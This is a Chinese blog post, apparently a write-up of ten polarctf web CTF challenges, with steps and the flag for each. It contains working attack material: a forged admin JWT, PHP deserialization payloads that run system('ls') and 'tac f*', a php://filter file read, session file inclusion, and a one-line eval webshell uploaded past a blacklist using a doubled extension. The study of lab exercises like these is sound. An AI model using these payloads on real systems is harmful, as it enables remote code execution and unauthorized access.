首页 > 其他分享 >Web刷题之polarctf靶场(2)

Web刷题之polarctf靶场(2)

时间:2024-09-22 21:53:17浏览次数:8  
标签:Web polarctf 发现 jwt flag 即可 F12 靶场 刷题

1.蜜雪冰城吉警店

点开靶场, 发现题目说点到隐藏奶茶(也就是第九杯)就给flag, 但是明显就只有八杯, 猜测大概率考的是前端代码修改

image

把id=1修改为id=9, 然后回到页面点击原味奶茶即可弹出flag

image

#flag{7d43cc8863ad0ee649048e562fde53ec}

2.召唤神龙

打开靶场发现是一个游戏, 爽玩了几把发现通关有难度啊

image

直接F12查看界面源码, 在main.js文件中发现一串文字, 猜测是jsfuck(源于brainfuck)

image

上工具, 解密得到flag
#flag{fdf9a88ec4fdd9e3dedaafeece5cc248}

image

3.seek flag

打开靶场按F12, 发现给出flag的提示, 我们用工具dirsearch扫描一下, 发现存在robots.txt文件

image
image

访问即可得到第三段flag3:c0ad71dadd11}

image

再通过BurpSuite抓包发包试试看能不能得到什么回显, 发现可以得到第二段flag2:3ca8737a70f029d

image

我们注意到在返回包中有个Set-Cookie, 我们尝试将id改为1发包, 得到flag1:flag{7ac5b

image

拼接三段flag得到最终结果:flag{7ac5b3ca8737a70f029dc0ad71dadd11}

4.jwt

打开靶场, 发现一个登录和注册, 猜测考察垂直越权, 通过普通用户提权到admin用户

image

用自己注册的用户名登录后按F12, 由于题目是jwt, 我们找出jwt的值, 然后用工具对其进行爆破得到密钥:SYSA

对JWT进行一个解释:
JWT(json web token),令牌以紧凑的形式由三部分组成,这些部分由点(.)分隔。

image

再通过在线网站:https://jwt.io/, 对所得到的jwt值进行解码(如若是线下赛, 可以以.来分割, 每段都用base64解码即可)
其次通过修改用户名为admin, 加入密钥, 得到新的jwt的值:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.9avq5ApZ-XZul2kbon8z2cB6Y4bNru_0nnIZfJ1mO50

image

修改网页的jwt值为新的jwt值, 然后重新访问网页即可

image

这样子我们就越权成功, 点开个人中心即可拿到flag

image

#flag{ec39c705cfb5295f9dddcedc819a1659}

5.签到

打开靶场, 发现提交的按钮点不了

image

果然打开BurpSuite进行抓包, 先通过发包看返回包, 发现需要用POST请求, 且参数值为key, 第一次尝试key=flag

image
image

再根据提示, 对参数值进行修改即可得到flag

image

#flag{fa3f77dd58a0a8f990bb6292da75618f}

6.session文件包含

打开靶场, 用BurpSuite进行抓包, 发现返回包中有Set-Cookie参数, 再根据题目描述, 猜测存在伪协议

image

将得到的base64密文, 放到厨子上解密

image

这里我们猜测session文件在/tmp目录下, 文件格式为sess_+sessionid, 这边sessionid在返回包中有

image

通过cat或者tac读取flag

image

#flag{43306e8113f53ece238c0a124432ce19}

7.Don't touch me

打开靶场, 按F12, 找到提示

image

接着直接F12大法, 跟着它的提示一步步走

image

访问fla.php即可

image

#flag{0cee5a97f12b172ceeea2e9f67b7413e}

8.php very nice

本题考察基础的反序列化

image

<?php
class Example
 {
     public $sys="system('ls');";
 }
$a = new Example();
echo serialize($a);
?>

#先将所有文件回显出来, O:7:"Example":1:{s:3:"sys";s:13:"system('ls');";}

image

发现存在flag.php, 因为它会直接执行, 我们用include+伪协议来读取
<?php
class Example
 {
     public $sys="include('php://filter/read=convert.base64-encode/resource=flag.php');";
 }
$a = new Example();
echo serialize($a);
?>

#O:7:"Example":1:{s:3:"sys";s:69:"include('php://filter/read=convert.base64-encode/resource=flag.php');";}

image

base64解密即可
#flag{202cb962ac59075b964b07152d234b70}

参考网上一把梭哈的做法

<?php
class Example
 {
     public $sys="system('tac f*');";
 }
$a = new Example();
echo serialize($a);
?>
#O:7:"Example":1:{s:3:"sys";s:17:"system('tac f*');";}

image

#flag{202cb962ac59075b964b07152d234b70}

9.cookie欺骗

抓包, 修改Cookie的值为admin即可

image

#flag{10e35c76602b330149ef009e0b484d8f}

10.upload

打开靶场, 发现要上传一句话木马, 发现有code里面应该藏着黑名单

image

代码审计后发现, 可以尝试双写文件后缀名尝试绕过

image

一句话木马
<?php @eval($_POST['aaa']);?>

image

再通过中国蚁剑进行连接即可

image

#flag{a89f40341f4271659154829a2215f428}

标签:Web,polarctf,发现,jwt,flag,即可,F12,靶场,刷题
From: https://www.cnblogs.com/tlomlyiyi/p/18399188

相关文章

  • [机器人仿真]WEBOTS中创建轮腿机器人模型-并联闭环机构的创建和使用
    想着做个轮腿的机器人玩玩,但是如果光用PID做算法,对于轮子加腿的结构似乎效果并不好,为了实现轮腿本身能够飞坡在一定高度下能够跳跃,我想着上个仿真模型来调试和学习LQR算法机器人仿真的软件似乎挺多,我查到比较常用的有ROS套件的一个,还有就是webots本着界面简单,开源(还有校园网方便......
  • 国内刷题平台推荐
    引言    在学习C++的过程中,最重要的就是刷题。本章给大家推荐几个国内主流的刷题网站。1.洛谷                洛谷(luogu.com.cn)是一个面向计算机科学教育的新生态平台,它为算法竞赛选手、程序设计爱好者以及院校企业机构提供算法题库、社区、训练工......
  • 力扣刷题笔记
    有序数组的平方:我的错误解法:publicclassTest{publicstaticvoidmain(String[]args){Solutions=newSolution();int[]nums={-5,-3,-2,-1};System.out.println(Arrays.toString(s.removeElement(nums)));;}}classSolutio......
  • 打卡信奥刷题(780)用Scratch图形化工具信P6414[普及组/提高组] [COCI2014-2015#1] PROSJ
    [COCI2014-2015#1]PROSJEK题目描述有一个数列aaa,现在按照下列公式求出一个数列bb......
  • 软件测试笔记|web自动化测试|Web 自动化测试中,闭环有哪些?闭环的目的是什么?
    在Web自动化测试中,常见的闭环有以下几种:一、业务流程闭环例如,对于一个电商网站的购物流程,可以包括以下闭环:1.用户登录->商品搜索->添加商品到购物车->结算->支付->订单确认。2.用户注册->完善个人信息->浏览商品->下单->查看订单状态。二、数据操作......
  • 软件测试笔记|web自动化测试|自动化测试中,模块封装有哪些?封装的目的是什么?
    在自动化测试中,常见的模块封装有以下几种:一、页面元素定位封装将页面上的各种元素定位方式(如通过ID、Name、XPath、CSS选择器等)进行封装,形成统一的元素定位方法。例如,可以创建一个函数,传入定位方式和定位表达式,返回定位到的元素对象。二、操作封装1.把对页面元素的常见......
  • 软件测试笔记|web自动化测试|Selenium 提供了哪些断言?
    Selenium主要通过与测试框架(如TestNG、JUnit等)结合使用来实现断言,本身并没有内置断言方法。以下是一些常用的结合测试框架实现的断言:一、TestNG框架中的断言:1.assertEquals(expected,actual):比较两个值是否相等。例如:importorg.testng.Assert;publicclassTestSel......
  • 2024.09.22 力扣刷题 Z字形变换
    题目:将一个给定字符串s根据给定的行数numRows,以从上往下、从左到右进行Z字形排列。比如输入字符串为"PAYPALISHIRING"行数为3时,排列如下:PAHNAPLSIIGYIR之后,你的输出需要从左往右逐行读取,产生出一个新的字符串,比如:"PAHNAPLSIIGYIR"。请你实......
  • 在当今时代使用 Nextjs:现代 Web 开发框架
    在当今快速发展的数字环境中,Web开发变得比以往更加复杂和动态。开发人员不断寻找能够简化工作流程、提高性能和增强用户体验的工具。在各种可用的框架中,Next.js已成为开发人员的最佳选择,因其易用性、灵活性和强大的功能而广受欢迎。Next.js构建于React之上,通过提供用于构建......
  • 在深入 Web 开发之前您必须了解的事项
    1.HTML、CSS、JavaScript——三位一体没有砖头就建不了房子,不掌握HTML、CSS和JavaScript就无法建立网站。HTML是您的结构,CSS使其看起来令人惊叹,而JavaScript通过交互性使其栩栩如生。如果您认真对待网络开发,请从这里开始。没有捷径!2.响应式设计或回家如果您的网......